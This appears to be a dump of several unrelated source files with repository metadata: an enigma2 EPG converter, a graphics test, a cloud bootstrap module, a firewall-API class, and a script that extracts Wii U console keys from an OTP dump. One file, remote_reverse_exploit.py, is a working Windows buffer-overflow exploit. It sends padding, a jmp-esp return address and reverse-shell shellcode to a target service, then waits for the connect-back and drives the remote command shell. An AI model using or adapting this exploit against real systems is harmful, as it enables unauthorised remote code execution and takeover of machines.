repo_name (string, 5-92) | path (string, 4-232) | copies (19 classes) | size (string, 4-7) | content (string, 721-1.04M) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
BlackHole/enigma2-obh10 | lib/python/Components/Converter/EventName.py | 2 | 10098 | from enigma import eEPGCache
from Components.Converter.Converter import Converter
from Components.Element import cached
from Components.Converter.genre import getGenreStringSub
from Components.config import config
from Tools.Directories import resolveFilename, SCOPE_CURRENT_SKIN
from time import localtime, mktime, strftime
class ETSIClassifications(dict):
def shortRating(self, age):
if age == 0:
return _("All ages")
elif age <= 15:
age += 3
return " %d+" % age
def longRating(self, age):
if age == 0:
return _("Rating undefined")
elif age <= 15:
age += 3
return _("Minimum age %d years") % age
def imageRating(self, age):
if age == 0:
return "ratings/ETSI-ALL.png"
elif age <= 15:
age += 3
return "ratings/ETSI-%d.png" % age
def __init__(self):
self.update([(i, (self.shortRating(c), self.longRating(c), self.imageRating(c))) for i, c in enumerate(range(0, 15))])
class AusClassifications(dict):
# In Australia "Not Classified" (NC) is to be displayed as an empty string.
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
SHORTTEXT = ("", "", "P", "P", "C", "C", "G", "G", "PG", "PG", "M", "M", "MA", "MA", "AV", "R")
LONGTEXT = {
"": _("Not Classified"),
"P": _("Preschool"),
"C": _("Children"),
"G": _("General"),
"PG": _("Parental Guidance Recommended"),
"M": _("Mature Audience 15+"),
"MA": _("Mature Adult Audience 15+"),
"AV": _("Adult Audience, Strong Violence 15+"),
"R": _("Restricted 18+")
}
IMAGES = {
"": "ratings/blank.png",
"P": "ratings/AUS-P.png",
"C": "ratings/AUS-C.png",
"G": "ratings/AUS-G.png",
"PG": "ratings/AUS-PG.png",
"M": "ratings/AUS-M.png",
"MA": "ratings/AUS-MA.png",
"AV": "ratings/AUS-AV.png",
"R": "ratings/AUS-R.png"
}
def __init__(self):
self.update([(i, (c, self.LONGTEXT[c], self.IMAGES[c])) for i, c in enumerate(self.SHORTTEXT)])
# Each country classification object in the map tuple must be an object that
# supports obj.get(key[, default]). It need not actually be a dict object.
#
# The other element is how the rating number should be formatted if there
# is no match in the classification object.
#
# If there is no matching country then the default ETSI should be selected.
countries = {
"ETSI": (ETSIClassifications(), lambda age: (_("bc%d") % age, _("Rating defined by broadcaster - %d") % age, "ratings/ETSI-na.png")),
"AUS": (AusClassifications(), lambda age: (_("BC%d") % age, _("Rating defined by broadcaster - %d") % age, "ratings/AUS-na.png"))
}
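# Illustrative lookup, based on the tables above (not part of the original converter):
# for country code "AUS" and rating value 10, countries["AUS"][0].get(10) yields
# ("M", _("Mature Audience 15+"), "ratings/AUS-M.png"); an out-of-range value such as 42
# falls back to the lambda and yields
# ("BC42", "Rating defined by broadcaster - 42", "ratings/AUS-na.png").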
class EventName(Converter, object):
NAME = 0
SHORT_DESCRIPTION = 1
EXTENDED_DESCRIPTION = 2
FULL_DESCRIPTION = 3
ID = 4
NAME_NOW = 5
NAME_NEXT = 6
NAME_NEXT2 = 7
GENRE = 8
RATING = 9
SRATING = 10
PDC = 11
PDCTIME = 12
PDCTIMESHORT = 13
ISRUNNINGSTATUS = 14
NEXT_DESCRIPTION = 21
THIRD_NAME = 22
THIRD_NAME2 = 23
THIRD_DESCRIPTION = 24
RAWRATING = 31
RATINGCOUNTRY = 32
RATINGICON = 33
KEYWORDS = {
# Arguments...
"Name": ("type", NAME),
"Description": ("type", SHORT_DESCRIPTION),
"ShortDescription": ("type", SHORT_DESCRIPTION), # added for consistency with MovieInfo
"ExtendedDescription": ("type", EXTENDED_DESCRIPTION),
"FullDescription": ("type", FULL_DESCRIPTION),
"ID": ("type", ID),
"NowName": ("type", NAME_NOW),
"NameNow": ("type", NAME_NOW),
"NextName": ("type", NAME_NEXT),
"NameNext": ("type", NAME_NEXT),
"NextNameOnly": ("type", NAME_NEXT2),
"NameNextOnly": ("type", NAME_NEXT2),
"Genre": ("type", GENRE),
"Rating": ("type", RATING),
"SmallRating": ("type", SRATING),
"Pdc": ("type", PDC),
"PdcTime": ("type", PDCTIME),
"PdcTimeShort": ("type", PDCTIMESHORT),
"IsRunningStatus": ("type", ISRUNNINGSTATUS),
"NextDescription": ("type", NEXT_DESCRIPTION),
"ThirdName": ("type", THIRD_NAME),
"ThirdNameOnly": ("type", THIRD_NAME2),
"ThirdDescription": ("type", THIRD_DESCRIPTION),
"RawRating": ("type", RAWRATING),
"RatingCountry": ("type", RATINGCOUNTRY),
"RatingIcon": ("type", RATINGICON),
# Options...
"Separated": ("separator", "\n\n"),
"NotSeparated": ("separator", "\n"),
"Trimmed": ("trim", True),
"NotTrimmed": ("trim", False)
}
RATSHORT = 0
RATLONG = 1
RATICON = 2
RATNORMAL = 0
RATDEFAULT = 1
def __init__(self, type):
Converter.__init__(self, type)
self.epgcache = eEPGCache.getInstance()
self.type = self.NAME
self.separator = "\n"
self.trim = False
parse = ","
type = type.replace(";", parse) # Some builds use ";" as a separator, most use ",".
args = [arg.strip() for arg in type.split(parse)]
for arg in args:
name, value = self.KEYWORDS.get(arg, ("Error", None))
if name == "Error":
print "[EventName] ERROR: Unexpected / Invalid argument token '%s'!" % arg
else:
setattr(self, name, value)
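# Illustrative (assumed skin usage): a converter argument string such as
# "NextName,Separated" sets self.type = NAME_NEXT and self.separator = "\n\n",
# per the KEYWORDS table above.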
def trimText(self, text):
if self.trim:
return str(text).strip()
else:
return str(text)
def formatDescription(self, description, extended):
description = self.trimText(description)
extended = self.trimText(extended)
if description[0:20] == extended[0:20]:
return extended
if description and extended:
description += self.separator
return description + extended
@cached
def getBoolean(self):
event = self.source.event
if event:
if self.type == self.PDC and event.getPdcPil():
return True
return False
boolean = property(getBoolean)
@cached
def getText(self):
event = self.source.event
if event is None:
return ""
if self.type == self.NAME:
return self.trimText(event.getEventName())
elif self.type in (self.RATING, self.SRATING, self.RATINGICON):
rating = event.getParentalData()
if rating:
age = rating.getRating()
country = rating.getCountryCode().upper()
if country in countries:
c = countries[country]
else:
c = countries["ETSI"]
if config.misc.epgratingcountry.value:
c = countries[config.misc.epgratingcountry.value]
rating = c[self.RATNORMAL].get(age, c[self.RATDEFAULT](age))
if rating:
if self.type == self.RATING:
return self.trimText(rating[self.RATLONG])
elif self.type == self.SRATING:
return self.trimText(rating[self.RATSHORT])
return resolveFilename(SCOPE_CURRENT_SKIN, rating[self.RATICON])
elif self.type == self.GENRE:
if not config.usage.show_genre_info.value:
return ""
genre = event.getGenreData()
if genre:
rating = event.getParentalData()
if rating:
country = rating.getCountryCode().upper()
else:
country = "ETSI"
if config.misc.epggenrecountry.value:
country = config.misc.epggenrecountry.value
return self.trimText(getGenreStringSub(genre.getLevel1(), genre.getLevel2(), country=country))
elif self.type == self.NAME_NOW:
return pgettext("now/next: 'now' event label", "Now") + ": " + self.trimText(event.getEventName())
elif self.type == self.SHORT_DESCRIPTION:
return self.trimText(event.getShortDescription())
elif self.type == self.EXTENDED_DESCRIPTION:
return self.trimText(event.getExtendedDescription() or event.getShortDescription())
elif self.type == self.FULL_DESCRIPTION:
return self.formatDescription(event.getShortDescription(), event.getExtendedDescription())
elif self.type == self.ID:
return self.trimText(event.getEventId())
elif self.type == self.PDC:
if event.getPdcPil():
return _("PDC")
elif self.type in (self.PDCTIME, self.PDCTIMESHORT):
pil = event.getPdcPil()
if pil:
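# PIL (Programme Identification Label) bit layout as decoded below:
# bits 15-19 = day, bits 11-14 = month, bits 6-10 = hour, bits 0-5 = minute.
# Illustrative value: pil = 0x5E189 -> day 11, month 12, 06:09.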
begin = localtime(event.getBeginTime())
start = localtime(mktime([begin.tm_year, (pil & 0x7800) >> 11, (pil & 0xF8000) >> 15, (pil & 0x7C0) >> 6, (pil & 0x3F), 0, begin.tm_wday, begin.tm_yday, begin.tm_isdst]))
if self.type == self.PDCTIMESHORT:
return strftime(config.usage.time.short.value, start)
return strftime(config.usage.date.short.value + " " + config.usage.time.short.value, start)
elif self.type == self.ISRUNNINGSTATUS:
if event.getPdcPil():
running_status = event.getRunningStatus()
if running_status == 1:
return _("Not running")
if running_status == 2:
return _("Starts in a few seconds")
if running_status == 3:
return _("Pausing")
if running_status == 4:
return _("Running")
if running_status == 5:
return _("Service off-air")
if running_status in (6, 7):
return _("Reserved for future use")
return _("Undefined")
elif self.type in (self.NAME_NEXT, self.NAME_NEXT2) or self.type >= self.NEXT_DESCRIPTION:
try:
reference = self.source.service
info = reference and self.source.info
if info:
test = ["ITSECX", (reference.toString(), 1, -1, 1440)] # Search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
if self.type == self.NAME_NEXT and self.list[1][1]:
return pgettext("now/next: 'next' event label", "Next") + ": " + self.trimText(self.list[1][1])
elif self.type == self.NAME_NEXT2 and self.list[1][1]:
return self.trimText(self.list[1][1])
elif self.type == self.NEXT_DESCRIPTION and (self.list[1][2] or self.list[1][3]):
return self.formatDescription(self.list[1][2], self.list[1][3])
if self.type == self.THIRD_NAME and self.list[2][1]:
return pgettext("third event: 'third' event label", "Later") + ": " + self.trimText(self.list[2][1])
elif self.type == self.THIRD_NAME2 and self.list[2][1]:
return self.trimText(self.list[2][1])
elif self.type == self.THIRD_DESCRIPTION and (self.list[2][2] or self.list[2][3]):
return self.formatDescription(self.list[2][2], self.list[2][3])
except:
# Failed to return any EPG data.
if self.type == self.NAME_NEXT:
return pgettext("now/next: 'next' event label", "Next") + ": " + self.trimText(event.getEventName())
elif self.type == self.RAWRATING:
rating = event.getParentalData()
if rating:
return "%d" % rating.getRating()
elif self.type == self.RATINGCOUNTRY:
rating = event.getParentalData()
if rating:
return rating.getCountryCode().upper()
return ""
text = property(getText)
| gpl-2.0 | 6,620,502,956,419,688,000 | 32.326733 | 174 | 0.650426 | false |
jtraver/dev | python/graphics/graph3.py | 1 | 1381 | #!/usr/bin/python
# http://mcsp.wartburg.edu/zelle/python/graphics.py
from graphics import *
SCALE = 10
def test():
win = GraphWin()
win.setCoords(0,0,10,10)
t = Text(Point(5,5), "Centered Text")
t.draw(win)
p = Polygon(Point(1,1), Point(5,3), Point(2,7))
p.draw(win)
e = Entry(Point(5,6), 10)
e.draw(win)
win.getMouse()
p.setFill("red")
p.setOutline("blue")
p.setWidth(2)
s = ""
for pt in p.getPoints():
s = s + "(%0.1f,%0.1f) " % (pt.getX(), pt.getY())
t.setText(e.getText())
e.setFill("green")
e.setText("Spam!")
e.move(2,0)
win.getMouse()
p.move(2,3)
s = ""
for pt in p.getPoints():
s = s + "(%0.1f,%0.1f) " % (pt.getX(), pt.getY())
t.setText(s)
win.getMouse()
p.undraw()
e.undraw()
t.setStyle("bold")
win.getMouse()
t.setStyle("normal")
win.getMouse()
t.setStyle("italic")
win.getMouse()
t.setStyle("bold italic")
win.getMouse()
t.setSize(14)
win.getMouse()
t.setFace("arial")
t.setSize(20)
win.getMouse()
win.close()
def circle():
win = GraphWin("My Circle", 100 * SCALE, 100 * SCALE)
c = Circle(Point(50 * SCALE,50 * SCALE), 10 * SCALE)
c.draw(win)
win.getMouse() # Pause to view result
win.close() # Close window when done
def main():
test()
circle()
main()
| mit | -1,893,172,085,288,062,700 | 20.246154 | 57 | 0.548878 | false |
tigercomputing/vortex | src/vortex/__init__.py | 1 | 2455 | # -*- coding: utf-8 -*-
#
# Copyright © 2015 Tiger Computing Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Vortex provides a means to specialise a bare Linux cloud instance according to
a version-controlled configuration.
It is designed to be bootstrapped from an `Amazon AWS`_ instance's `User Data`_
field using `Cloud-Init`_. From there it configures your instance according to
your configuration (for example using `Puppet`_).
.. _Amazon AWS: http://aws.amazon.com/
.. _User Data: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/\
ec2-instance-metadata.html
.. _Cloud-Init: https://launchpad.net/cloud-init
.. _Puppet: https://puppetlabs.com/
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import vortex.logsetup
# NB important side-effect: this import runs pre-requisite checks.
from vortex.environment import check_modules
logger = logging.getLogger(__name__)
def stage2():
"""
Main entry-point for Stage 2 of the bootstrapping process.
This function is called by the :mod:`vortex.bootstrap` module once the main
:mod:`vortex` package is available. This checks that the environment is set
up correctly (using :func:`vortex.environment.check_modules` with
``install=True``), then starts the deployment process by calling
:meth:`vortex.runtime.Runtime.run`.
"""
# We can't set up logging properly until we can read our configuration,
# which we can't do until we have Six installed. Let's just tweak some
# defaults so the user can see *something* before we get that far.
vortex.logsetup.configure(None)
# Make sure we have all the modules we require
check_modules(install=True)
# Now that we have the required modules, we can import our main runtime and
# get started
from vortex.runtime import runtime
runtime.run()
| gpl-3.0 | 4,379,782,510,870,833,000 | 36.753846 | 79 | 0.737571 | false |
daxm/fmcapi | fmcapi/api_objects/object_services/dnsservergroups.py | 1 | 2479 | """DNS Server Groups Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
class DNSServerGroups(APIClassTemplate):
"""The DNSServerGroups Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"retries",
"timeout",
"dnsservers",
"defaultdomain",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + []
URL_SUFFIX = "/object/dnsservergroups"
REQUIRED_FOR_POST = ["name", "timeout"]
VALID_CHARACTERS_FOR_NAME = r"""[.\w\d_\- ]"""
def __init__(self, fmc, **kwargs):
"""
Initialize DNSServerGroups object.
Set self.type to "DNSServerGroupObject" and parse the kwargs.
:param fmc: (object) FMC object
:param kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for DNSServerGroups class.")
self.parse_kwargs(**kwargs)
self.type = "DNSServerGroupObject"
def servers(self, action, name_servers):
"""
Associate DNS Servers.
:param action: (str) 'add', 'remove', or 'clear'
:param name_servers: (str) Name of DNS server.
"""
logging.debug("In servers() for DNSServerGroups class.")
if action == "add":
for name_server in name_servers:
if "dnsservers" in self.__dict__:
self.dnsservers.append({"name-server": name_server})
else:
self.dnsservers = [{"name-server": name_server}]
logging.info(
f'Name-server "{name_server}" added to this DNSServerGroups object.'
)
elif action == "remove":
if "dnsservers" in self.__dict__:
for name_server in name_servers:
self.dnsservers = list(
filter(
lambda i: i["name-server"] != name_server, self.dnsservers
)
)
else:
logging.warning(
"DNSServerGroups has no members. Cannot remove name-server."
)
elif action == "clear":
if "dnsservers" in self.__dict__:
del self.dnsservers
logging.info(
"All name-servers removed from this DNSServerGroups object."
)
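# Illustrative usage sketch (assumed, not part of this module; fmc1 and the
# inherited post() call come from the surrounding fmcapi package):
#
# with fmcapi.FMC(host="10.0.0.10", username="api", password="secret") as fmc1:
#     grp = DNSServerGroups(fmc=fmc1, name="lab-dns", timeout=3)
#     grp.servers(action="add", name_servers=["8.8.8.8", "8.8.4.4"])
#     grp.post()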
| bsd-3-clause | 5,905,963,153,461,864,000 | 32.958904 | 88 | 0.519968 | false |
sigma-random/Win32_Shellcode | C-shellcode/remote_reverse_exploit.py | 1 | 3240 | #!/usr/bin/env python
from socket import *
from struct import *
from time import *
import sys
def L32(val): return pack('<I',val)
def ip_value(ip_str):
ret = 0x00000000
str_list = ip_str.split('.')
for i in xrange(len(str_list)):
ret += int(str_list[i])<<(3-i)*8
return ret
def exploit(ip,port,data):
sockfd = socket(AF_INET,SOCK_STREAM)
sockfd.connect((ip,port))
sockfd.send(data+'\x0a')
#sockfd.recv(1)
sockfd.close()
def recv_until(sockfd,mark=''):
ret = ''
while True:
buf = sockfd.recv(4096)
ret += buf
if mark in buf :
break
return ret
def bind_local(ip,port):
servsockfd = socket(AF_INET , SOCK_STREAM)
servsockfd.bind((ip,port))
servsockfd.listen(10)
print "listen on %s:%s" % (ip,port)
clisockfd,client_addr = servsockfd.accept()
print "connected from remote host %s:%s" % client_addr
sys.stdout.write(recv_until(clisockfd,mark='>'))
while True:
data = raw_input()
if data in ['exit','q','quit']:
break
clisockfd.send(data+'\n')
sys.stdout.write(recv_until(clisockfd,mark='>'))
clisockfd.close()
servsockfd.close()
return
########################################################################################################
TARGET_IP = '192.168.43.128'
TARGET_PORT = 1000
############################################################
# reverse shellcode
#
# NOTE: replace 192.168.43.1 with your own IP address
############################################################
REVERSE_IP = '192.168.43.1'
REVERSE_PORT = 4444
REVERSE_SHELLCODE = \
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +\
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +\
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +\
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +\
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +\
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +\
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +\
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +\
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +\
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +\
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +\
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +\
"\xD5\x89\xC7\x68" +\
pack('>L',ip_value(REVERSE_IP)) +\
"\x68\x02\x00" +\
pack('>H',REVERSE_PORT) +\
"\x89\xE6\x6A" +\
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +\
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +\
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +\
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +\
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +\
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +\
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
if __name__ == '__main__':
JUNK = L32(0x90909090)
EIP = L32(0x7ffa4512) #jmp_esp = 0x7ffa4512
data = 'a' * 64 + JUNK + EIP + JUNK + REVERSE_SHELLCODE
print '\n\n[*] begin to exploit.....'
exploit(TARGET_IP, TARGET_PORT, data)
bind_local(REVERSE_IP,REVERSE_PORT)
print '\n\n[*] finished!......'
| gpl-2.0 | 4,696,895,885,518,288,000 | 31.4 | 104 | 0.61821 | false |
Whovian9369/OTPKeySplitter | OTPKeySplitter.py | 1 | 15977 | #!/usr/bin/env python3
import os, sys, zlib, binascii
import codecs
from Crypto.Cipher import AES
otpbin = os.path.abspath("otp.bin")
if not os.path.exists(otpbin):
print("Put the otp.bin into this directory, please!")
sys.exit(1)
keytxt = open('Keys.txt', 'a')
#Thank you Audiosurf for the initial directory creation help.
#Mine was way too messy originally!
x = "Output/"
k = " - Wii U Bank"
outputfol = [x, x+"00 - Wii Bank" , x+"01"+k, x+"02"+k, x+"03"+k, x+"04 - Wii U NG Bank", x+"05 - Wii U Certificate Bank" , x+"06 - Wii Certificate Bank", x+"07 - Misc Bank"]
for f in outputfol:
if not os.path.exists(f):
os.makedirs(f)
#Other Variables that will be used later down the line:
out0 = x+"00 - Wii Bank"+"/"
out1 = x+"01"+k+"/"
out2 = x+"02"+k+"/"
out3 = x+"03"+k+"/"
out4 = x+"04 - Wii U NG Bank/"
out5 = x+"05 - Wii U Certificate Bank/"
out6 = x+"06 - Wii Certificate Bank/"
out7 = x+"07 - Misc Bank/"
#End other variables
#prepare keys
#Thanks FIX94 for this code snippet from the iosuhax
#fw.img grabber in his IOSUHax fork.
#For the source of this code, see:
#https://github.com/FIX94/iosuhax/blob/master/bin/getfwimg.py
with open(otpbin,'rb') as f:
print("Key extraction time!")
# First, vWii.
f.seek(0x000)
wii_boot1_sha1 = f.read(20)
f.seek(0x014)
wii_common_key = f.read(16)
f.seek(0x024)
wii_ng_id = f.read(4)
f.seek(0x028)
wii_ng_priv_key = f.read(29)
f.seek(0x044)
wii_nand_hmac = f.read(20)
f.seek(0x058)
wii_nand_key = f.read(16)
f.seek(0x068)
wii_rng_key = f.read(16)
f.seek(0x078)
wii_unknown01_padding = f.read(8)
#Wiki switches to Bank 1 (Wii U) right here. See #L78 // 0x300 begins Bank 6.
f.seek(0x300)
wii_root_cert_ms_id_0x00000002 = f.read(4)
f.seek(0x304)
wii_root_cert_ca_id_0x00000001 = f.read(4)
f.seek(0x308)
wii_root_cert_ng_key_id = f.read(4)
f.seek(0x30C)
wii_root_cert_ng_signature = f.read(60)
f.seek(0x348)
wii_korean_key = f.read(16)
f.seek(0x358)
wii_unknown02_unused = f.read(8)
f.seek(0x360)
wii_private_nss_device_cert_key = f.read(32)
# Wii U
f.seek(0x080)
security_level_flag = f.read(4)
f.seek(0x084)
iostrength_config_flag = f.read(4)
f.seek(0x088)
seeprom_manual_clk_pulse_length = f.read(4)
f.seek(0x08C)
SigType_00010000 = f.read(4)
f.seek(0x090)
wiiu_starbuck_ancast_key = f.read(16)
f.seek(0x0A0)
wiiu_seeprom_key = f.read(16)
f.seek(0x0B0)
unknown_01_unused = f.read(16)
f.seek(0x0C0)
unknown_02_unused = f.read(16)
f.seek(0x0D0)
vwii_common_key = f.read(16)
f.seek(0x0E0)
wiiu_common_key = f.read(16)
f.seek(0x0F0)
unknown_03_unused = f.read(16)
f.seek(0x100)
unknown_04_unused = f.read(16)
f.seek(0x110)
unknown_05_unused = f.read(16)
f.seek(0x120)
encrypt_decrypt_ssl_rsa_key = f.read(16)
f.seek(0x130)
usb_storage_key_seed_encryption_key = f.read(16)
f.seek(0x140)
unknown_06 = f.read(16)
f.seek(0x150)
wiiu_xor_key = f.read(16)
f.seek(0x160)
wiiu_rng_key = f.read(16)
f.seek(0x170)
wiiu_slc_nand_key = f.read(16)
f.seek(0x180)
wiiu_mlc_emmc_key = f.read(16)
f.seek(0x190)
encrypt_decrypt_shdd_key = f.read(16)
f.seek(0x1A0)
encryption_key_for_drh_wlan_data = f.read(16)
f.seek(0x1B0)
unknown_07_unused = f.read(48)
f.seek(0x1E0)
wiiu_slc_nand_hmac = f.read(20)
f.seek(0x1F4)
unknown_08_padding = f.read(12)
f.seek(0x200)
unknown_09_unused = f.read(16)
f.seek(0x210)
unknown_10_unused = f.read(12)
f.seek(0x21C)
wiiu_ng_id = f.read(4)
f.seek(0x220)
wiiu_ng_private_key = f.read(32)
f.seek(0x240)
wiiu_private_nss_device_cert_key = f.read(32)
f.seek(0x260)
wiiu_otp_rng_seed = f.read(16)
f.seek(0x270)
unknown_12_unused = f.read(16)
f.seek(0x280)
wiiu_root_cert_ms_id_0x00000012 = f.read(4)
f.seek(0x284)
wiiu_root_cert_ca_id_0x00000003 = f.read(4)
f.seek(0x288)
wiiu_root_cert_ng_key_id = f.read(4)
f.seek(0x28C)
wiiu_root_cert_ng_signature = f.read(64)
f.seek(0x2C8)
unknown_14_unused = f.read(20)
f.seek(0x2E0)
unknown_15_locked_by_boot1 = f.read(32)
# MISC
f.seek(0x380)
boot1_locked_unknown_01 = f.read(32)
f.seek(0x3A0)
boot1_key_locked_by_b0 = f.read(16)
f.seek(0x3B0)
boot0_locked_unused_01 = f.read(16)
f.seek(0x3C0)
misc_empty1 = f.read(32)
f.seek(0x3E0)
misc_empty2 = f.read(4)
f.seek(0x3E4)
otp_version_and_revision = f.read(4)
f.seek(0x3E8)
otp_date_code = f.read(8)
f.seek(0x3F0)
otp_version_name_string = f.read(8)
f.seek(0x3F8)
misc_empty3 = f.read(4)
f.seek(0x3FC)
jtag_status = f.read(4)
#Output to files. This will be messy.
#Probably way messier than above.
#vWii
# 0. Wii Bank
targetfol=out0
keytxt.write("(Most of) vWii:\n\n")
WII = (
("01. Wii boot1 SHA-1 hash", wii_boot1_sha1),
("02. Wii common key", wii_common_key),
("03. Wii NG ID", wii_ng_id),
("04. Wii NG private key", wii_ng_priv_key),
("05. Wii NAND HMAC (overlaps with NG private key)", wii_nand_hmac),
("06. Wii NAND key", wii_nand_key),
("07. Wii RNG key", wii_rng_key),
("08. Unknown (Padding)", wii_unknown01_padding)
)
for name, data in WII:
with open(targetfol+name+".bin", "wb") as fi:
fi.write(data)
keytxt.write("\n{}: {}\n".format(
name, binascii.hexlify(data).decode('utf-8')))
keytxt.write("\n------------------------------------------------")
# Wii U
keytxt.write("\n\n*(Mostly) Wii U:\n")
keytxt.write("\n 1. Wii U Bank\n")
# 1. Wii U Bank
targetfol=out1
name="01. Security level flag"
fi = open(targetfol+name+".bin", "wb")
fi.write(security_level_flag)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(security_level_flag).decode('utf-8')+"\n")
name="02. Some flag for IOStrength configurations"
fi = open(targetfol+name+".bin", "wb")
fi.write(iostrength_config_flag)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(iostrength_config_flag).decode('utf-8')+"\n")
name="03. Pulse length for SEEPROM manual CLK"
fi = open(targetfol+name+".bin", "wb")
fi.write(seeprom_manual_clk_pulse_length)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(seeprom_manual_clk_pulse_length).decode('utf-8')+"\n")
name="04. Seems_To_Be_A_Sig_Type_(0x00010000)"
fi = open(targetfol+name+".bin", "wb")
fi.write(SigType_00010000)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(SigType_00010000).decode('utf-8')+"\n")
name="05. Wii U Starbuck ancast key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_starbuck_ancast_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_starbuck_ancast_key).decode('utf-8')+"\n")
name="06. Wii U SEEPROM key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_seeprom_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_seeprom_key).decode('utf-8')+"\n")
name="07. Unknown (01)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_01_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_01_unused).decode('utf-8')+"\n")
name="08. Unknown (02)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_02_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_02_unused).decode('utf-8')+"\n")
name="09. vWii common key"
fi = open(targetfol+name+".bin", "wb")
fi.write(vwii_common_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(vwii_common_key).decode('utf-8')+"\n")
name="10. Wii U Common Key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_common_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_common_key).decode('utf-8')+"\n")
name="11. Unknown (03)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_03_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_03_unused).decode('utf-8')+"\n")
# 2. Wii U Bank
keytxt.write("\n 2. Wii U Bank\n")
targetfol=out2
name="01. Unknown (04)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_04_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_04_unused).decode('utf-8')+"\n")
name="02. Unknown (05)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_05_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_05_unused).decode('utf-8')+"\n")
name="03. Key to encrypt or decrypt SSL RSA key"
fi = open(targetfol+name+".bin", "wb")
fi.write(encrypt_decrypt_ssl_rsa_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(encrypt_decrypt_ssl_rsa_key).decode('utf-8')+"\n")
name="04. Key to encrypt seeds for USB storage keys"
fi = open(targetfol+name+".bin", "wb")
fi.write(usb_storage_key_seed_encryption_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(usb_storage_key_seed_encryption_key).decode('utf-8')+"\n")
name="05. Unknown (06)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_06)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_06).decode('utf-8')+"\n")
name="06. Wii U XOR key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_xor_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_xor_key).decode('utf-8')+"\n")
name="07. Wii U RNG key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_rng_key)
fi.close()
